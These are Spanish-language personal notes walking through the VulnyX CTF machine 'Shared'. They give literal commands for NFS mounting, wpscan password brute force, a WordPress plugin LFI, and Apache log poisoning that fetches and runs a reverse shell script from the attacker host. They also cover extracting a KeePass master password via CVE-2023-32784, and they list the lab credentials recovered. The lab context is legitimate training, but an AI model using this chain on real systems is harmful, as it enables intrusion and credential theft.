Notas de Luis

Hacemos el escaneo con nmap:

Al estar abierto el puerto 111, vemos 3 monturas en el sistema:

Nos traemos cada una de estas monturas con el comando mount:

mount 10.10.10.5:/shared/tmp/ /mnt/montura/
mount 10.10.10.5:/shared/j4ckie/ /mnt/montura_condor/
mount 10.10.10.5:/shared/condor/ /mnt/montura/

En esta parte no encontramos nada, pero si hacemos fuzzing web, nos encontramos con un wordpress:

Al ponerlo en el navegador nos da un error, pero sí nos reporta un dominio shared.nyx:

Lo añadimos al fichero /hosts:

Y nos funciona:

Tras hacer una enumeración agresiva de plugins con wpscan, vemos un plugin algo desactualizado:

wpscan --url http://shared.nyx/wordpress/ -U admin -P /usr/share/wordlists/rockyou.txt

El cual vemos que en principio es vulnerable a un LFI:

Y dentro de este primer enlace nos encontramos con unas instrucciones de cómo explotar el LFI:

Lo probamos y funciona:

http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd

Probamos la ruta para explotar un log poisoning y funciona:

http://shared.nyx/wordpress/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/var/log/apache2/access.log

Lanzamos un comando con curl, por ejemplo whoami:

curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('whoami'); ?>"

Y dentro de los logs vemos que se ha ejecutado el comando:

Nos creamos una reverse shell y la compartimos con la máquina víctima:

curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('wget 10.10.10.7/shell.sh'); ?>"
 
curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('chmod 777 shell.sh'); ?>"
 
curl -s -X GET 'http://shared.nyx/wordpress/' -H "User-Agent: <?php system('bash shell.sh'); ?>"

Y estamos dentro:

Y dentro del directorio de wordpress, tenemos el archivo de wp.config.php, donde se guardan credenciales de bases de datos:

wordpress:R9o17ONkbFk2BrRHG7zY

Accedemos a la base de datos:

mysql -u wordpress -pR9o17ONkbFk2BrRHG7z

Y tenemos una tabla de wp-users donde tenemos credenciales:

admin:$P$BEFipQ4xz8hMCnY7kD7lwLTfrDENmN/

Pero por aquí no viene la intrusión, aunque si vamos al directorio /var/www/html/wordpress/backups nos encontramos con un archivo .zip, que debemos descomprimir y nos dará una base de datos de keepass:

unzip cp-sharedbbdd.zip

Nos compartimos esta base de datos y el archivo .tmp a nuestra máquina atacante:

Al tener el keepass y el .dmp, podemos explotar una vulnerabilidad, la CVE-2023-32784, donde podemos obtener la PoC del siguiente repositorio de github:

https://github.com/z-jxy/keepass_dump

Y ejecutamos el siguiente comando:

python3 keepass_dump.py -f KeePass.DMP --skip --debug

La contraseña sería Shared123%, por lo que abrimos la base de datos:

Y dentro de esta base de datos obtenemos las siguientes credenciales:

condor:OjNIhkKb2tUnmChoFnJI
j4ckie:p8Ucx8ab2N8AIfmP83E8
jackondor:7iwylOTHddtPakkgTJV9

La contraseña de jackondor vemos que funciona:

computing/hacking/ctf/vulnyx/maquina_shared.txt · Última modificación: por 127.0.0.1